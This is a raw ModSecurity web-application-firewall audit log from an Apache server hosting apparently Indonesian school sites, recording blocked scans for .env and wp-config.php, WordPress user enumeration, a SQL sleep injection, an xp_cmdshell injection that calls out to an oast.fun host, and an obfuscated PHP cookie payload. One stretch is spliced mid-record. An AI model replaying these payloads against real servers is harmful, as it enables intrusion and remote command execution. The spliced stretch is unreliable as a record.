Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a677233f-Z-- --2c1e7554-A-- [23/May/2025:03:27:05 +0700] aC-ImW_WNRyhaqaKDLwgWgAAAMU 103.236.140.4 34342 103.236.140.4 8181 --2c1e7554-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.254.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.254.121 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --2c1e7554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c1e7554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747945625800349 1073 (- - -) Stopwatch2: 1747945625800349 1073; combined=348, p1=311, p2=0, p3=0, p4=0, p5=37, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c1e7554-Z-- --ab662f4f-A-- [23/May/2025:03:47:20 +0700] aC-NWLz70bfNdlplZZOxLgAAAFQ 103.236.140.4 34418 103.236.140.4 8181 --ab662f4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.231.79.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.231.79.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab662f4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab662f4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747946840352494 3594 (- - -) Stopwatch2: 1747946840352494 3594; combined=1550, p1=555, p2=964, p3=0, p4=0, p5=31, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab662f4f-Z-- --00c89c1b-A-- [23/May/2025:03:58:27 +0700] aC-P8x67_KloOut96EndIAAAAJE 103.236.140.4 34510 103.236.140.4 8181 --00c89c1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.217.254.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.217.254.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00c89c1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00c89c1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747947507906649 2842 (- - -) Stopwatch2: 1747947507906649 2842; combined=1276, p1=422, p2=824, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00c89c1b-Z-- --3a1fa900-A-- [23/May/2025:04:01:53 +0700] aC-Qwbz70bfNdlplZZOxOQAAAFI 103.236.140.4 34596 103.236.140.4 8181 --3a1fa900-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159431781 --3a1fa900-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --3a1fa900-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a1fa900-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747947713353167 2695 (- - -) Stopwatch2: 1747947713353167 2695; combined=1503, p1=356, p2=1122, p3=0, p4=0, p5=25, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a1fa900-Z-- --560ed264-A-- [23/May/2025:04:05:26 +0700] aC-RllYzwfxII7zMfyHb-QAAAAw 103.236.140.4 34618 103.236.140.4 8181 --560ed264-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 148.113.181.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 148.113.181.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --560ed264-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --560ed264-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747947926849989 3054 (- - -) Stopwatch2: 1747947926849989 3054; combined=1317, p1=458, p2=831, p3=0, p4=0, p5=28, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --560ed264-Z-- --2aa42a5e-A-- [23/May/2025:04:27:39 +0700] aC-Wy1YzwfxII7zMfyHcAgAAAAQ 103.236.140.4 34706 103.236.140.4 8181 --2aa42a5e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2aa42a5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2aa42a5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747949259456268 830 (- - -) Stopwatch2: 1747949259456268 830; combined=304, p1=268, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2aa42a5e-Z-- --75813218-A-- [23/May/2025:04:28:53 +0700] aC-XFR67_KloOut96EndQAAAAJA 103.236.140.4 34742 103.236.140.4 8181 --75813218-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 143.110.213.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 143.110.213.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --75813218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75813218-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747949333588039 866 (- - -) Stopwatch2: 1747949333588039 866; combined=331, p1=295, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75813218-Z-- --b6f84967-A-- [23/May/2025:04:37:05 +0700] aC-ZAVYzwfxII7zMfyHcIAAAAAY 103.236.140.4 34792 103.236.140.4 8181 --b6f84967-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 774 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/soap+xml X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162993634 --b6f84967-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0mbkqa4kqtm561jt3n08pq14hqyejy4w.oast.fun'-- --b6f84967-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6f84967-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747949825305096 2170 (- - -) Stopwatch2: 1747949825305096 2170; combined=1402, p1=294, p2=1053, p3=14, p4=16, p5=25, sr=40, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6f84967-Z-- --3cb9c104-A-- [23/May/2025:05:01:33 +0700] aC-evR67_KloOut96EndRQAAAJg 103.236.140.4 34976 103.236.140.4 8181 --3cb9c104-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Charset: utf-8 --3cb9c104-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cb9c104-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747951293990934 696 (- - -) Stopwatch2: 1747951293990934 696; combined=269, p1=233, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cb9c104-Z-- --1238837d-A-- [23/May/2025:05:17:31 +0700] aC-ie2_WNRyhaqaKDLwgjwAAAMw 103.236.140.4 35276 103.236.140.4 8181 --1238837d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.239.54.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.239.54.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1238837d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1238837d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747952251534688 3138 (- - -) Stopwatch2: 1747952251534688 3138; combined=1365, p1=467, p2=861, p3=0, p4=0, p5=37, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1238837d-Z-- --bfef4f09-A-- [23/May/2025:05:19:51 +0700] aC-jBx67_KloOut96EndXQAAAIg 103.236.140.4 35286 103.236.140.4 8181 --bfef4f09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.157.114.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.157.114.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bfef4f09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfef4f09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747952391816870 3111 (- - -) Stopwatch2: 1747952391816870 3111; combined=1368, p1=494, p2=845, p3=0, p4=0, p5=29, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfef4f09-Z-- --84c44d50-A-- [23/May/2025:05:23:43 +0700] aC-j71YzwfxII7zMfyHcPAAAAAc 103.236.140.4 35302 103.236.140.4 8181 --84c44d50-B-- GET /wp-content/themes/twentyseven/index.php HTTP/1.0 Host: smkn22-jkt.sch.id Cookie: 14[5]=;14[7]=7;14[12]=1;14[14]=14;14[19]=2;14[21]=21;14[26]=3;14[28]=28;14[33]=4;14[35]=35;14[40]=file_exists;14[42]=42;14[47]=fopen;14[49]=49;14[54]=trim;14[56]=56;14[61]=8;14[63]=63;14[68]=9;14[70]=70;14[75]=base64_decode;14[77]=77;14[82]=11;14[84]=84;14[89]=12;14[91]=91;14[96]=/test-422.txt;14[98]=98;14[103]=14;14[105]=105;14[110]=a;14[112]=112;14[117]=16;14[119]=119;14[124]=17;14[126]=126;14[131]=18;14[133]=133;14[138]=19;14[140]=140;14[145]=20;14[147]=147;14[152]=getcwd;14[154]=154;14[159]=22;14[161]=161;14[166]=23;14[168]=168;14[173]=24;14[175]=175;14[180]=fwrite;14[182]=182;14[187]=26;14[189]=189;14[194]=27;14[196]=196;14[201]=28;14[203]=203;14[208]= string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0mbkqa4kqtm561jt3n0eem7mgzxr4daj.oast.fun'-- --5d45bd1b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d45bd1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747956607178938 3783 (- - -) Stopwatch2: 1747956607178938 3783; combined=2496, p1=549, p2=1856, p3=29, p4=34, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d45bd1b-Z-- --83d5e67f-A-- [23/May/2025:07:35:22 +0700] aC_Cyrz70bfNdlplZZOzEwAAAFg 103.236.140.4 38768 103.236.140.4 8181 --83d5e67f-B-- GET /php.ini HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --83d5e67f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83d5e67f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747960522391225 1705 (- - -) Stopwatch2: 1747960522391225 1705; combined=716, p1=308, p2=380, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83d5e67f-Z-- --c351a020-A-- [23/May/2025:07:35:22 +0700] aC_Cyrz70bfNdlplZZOzFAAAAFM 103.236.140.4 38770 103.236.140.4 8181 --c351a020-B-- GET /php.ini HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c351a020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c351a020-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747960522420794 1578 (- - -) Stopwatch2: 1747960522420794 1578; combined=628, p1=301, p2=301, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c351a020-Z-- --c8de8c1a-A-- [23/May/2025:07:40:29 +0700] aC_D_W_WNRyhaqaKDLwiNwAAANg 103.236.140.4 39618 103.236.140.4 8181 --c8de8c1a-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c8de8c1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8de8c1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747960829127161 813 (- - -) Stopwatch2: 1747960829127161 813; combined=306, p1=271, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8de8c1a-Z-- --2a05f846-A-- [23/May/2025:07:40:29 +0700] aC_D_W_WNRyhaqaKDLwiOAAAAME 103.236.140.4 39620 103.236.140.4 8181 --2a05f846-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2a05f846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a05f846-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747960829152313 684 (- - -) Stopwatch2: 1747960829152313 684; combined=246, p1=215, p2=0, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a05f846-Z-- --f4796b65-A-- [23/May/2025:07:51:52 +0700] aC_GqG_WNRyhaqaKDLwiagAAANI 103.236.140.4 40046 103.236.140.4 8181 --f4796b65-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1737 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.172 Accept: 